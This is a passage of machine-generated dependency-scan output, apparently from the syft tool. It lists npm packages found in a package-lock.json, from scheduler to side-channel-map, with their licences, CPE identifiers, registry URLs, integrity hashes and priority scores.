cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/safer-buffer@2.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz + integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2ab87631c01bfc3f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: scheduler 0.17.0' + title: scheduler 0.17.0 + description: 'Package discovered: scheduler 0.17.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e689757d7bf8470d + name: scheduler + version: 0.17.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/scheduler@0.17.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz + integrity: sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA== + dependencies: + loose-envify: ^1.1.0 + object-assign: ^4.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bbbd7dd6a8a5a506 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: scheduler 0.23.2' + title: scheduler 0.23.2 + description: 'Package discovered: scheduler 0.23.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d0ebbd8a4bc7ada1 + name: scheduler + version: 0.23.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/scheduler@0.23.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz + integrity: sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ== + dependencies: + loose-envify: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 613adae5df8a79db + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: scmp 2.1.0' + title: scmp 2.1.0 + description: 'Package discovered: scmp 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 607830ce210254e3 + name: scmp + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/scmp@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz + integrity: sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 186e8c930a60e0f6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: selderee 0.11.0' + title: selderee 0.11.0 + description: 'Package discovered: selderee 0.11.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a6fb1c756dcd04fc + name: selderee + version: 0.11.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/selderee@0.11.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz + integrity: sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA== + dependencies: + parseley: ^0.12.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 809205930987a974 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: semver 7.7.4' + title: semver 7.7.4 + description: 'Package discovered: semver 7.7.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dc47801cc9b2ec78 + name: semver + version: 7.7.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/semver@7.7.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/semver/-/semver-7.7.4.tgz + integrity: sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 67469cce48d87167 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: send 0.19.2' + title: send 0.19.2 + description: 'Package discovered: send 0.19.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1d81dd407a94f88a + name: send + version: 0.19.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/send@0.19.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/send/-/send-0.19.2.tgz + integrity: sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg== + dependencies: + debug: 2.6.9 + depd: 2.0.0 + destroy: 1.2.0 + encodeurl: ~2.0.0 + escape-html: ~1.0.3 + etag: ~1.8.1 + fresh: ~0.5.2 + http-errors: ~2.0.1 + mime: 1.6.0 + ms: 2.1.3 + on-finished: ~2.4.1 + range-parser: ~1.2.1 + statuses: ~2.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3a3b9a5d9af10f0c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: serve-static 1.16.3' + title: serve-static 1.16.3 + description: 'Package discovered: serve-static 1.16.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0a7cfe5561f2b18b + name: serve-static + version: 1.16.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/serve-static@1.16.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz + integrity: sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA== + dependencies: + encodeurl: ~2.0.0 + escape-html: ~1.0.3 + parseurl: ~1.3.3 + send: ~0.19.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aaaf7e5ff977361c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: set-blocking 2.0.0' + title: set-blocking 2.0.0 + description: 'Package discovered: set-blocking 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: afe02a75a981b13d + name: set-blocking + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/set-blocking@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz + integrity: sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 506518f9c8ac4766 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: setprototypeof 1.2.0' + title: setprototypeof 1.2.0 + description: 'Package discovered: setprototypeof 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fc983ad918ad063a + name: setprototypeof + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/setprototypeof@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz + integrity: sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fdeea92c74bf39fa + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: sharp 0.34.5' + title: sharp 0.34.5 + description: 'Package discovered: sharp 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f96d5af8de184f83 + name: sharp + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/sharp@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz + integrity: sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg== + dependencies: + '@img/colour': ^1.0.0 + detect-libc: ^2.1.2 + semver: ^7.7.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a0d820679cbb3cb7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: shebang-command 2.0.0' + title: shebang-command 2.0.0 + description: 'Package discovered: shebang-command 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 14d8b5cbe6162ddd + name: shebang-command + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/shebang-command@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz + integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA== + dependencies: + shebang-regex: ^3.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f5b7b8efb70e19a9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: shebang-regex 3.0.0' + title: shebang-regex 3.0.0 + description: 'Package discovered: shebang-regex 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b86e26fe1fc6c7c9 + name: shebang-regex + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/shebang-regex@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz + integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6b555e361c3642d5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: side-channel 1.1.0' + title: side-channel 1.1.0 + description: 'Package discovered: side-channel 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a236188908f1e843 + name: side-channel + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/side-channel@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz + integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw== + dependencies: + es-errors: ^1.3.0 + object-inspect: ^1.13.3 + side-channel-list: ^1.0.0 + side-channel-map: ^1.0.1 + side-channel-weakmap: ^1.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 890b23d99b8d3706 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: side-channel-list 1.0.1' + title: side-channel-list 1.0.1 + description: 'Package discovered: side-channel-list 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2e4a230ff21329f1 + name: side-channel-list + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/side-channel-list@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz + integrity: sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w== + dependencies: + es-errors: ^1.3.0 + object-inspect: ^1.13.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6043652240bb3202 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: side-channel-map 1.0.1' + title: side-channel-map 1.0.1 + description: 'Package discovered: side-channel-map 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 36c9d18daa63eabd + name: side-channel-map + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/side-channel-map@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz + integrity: sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA== + 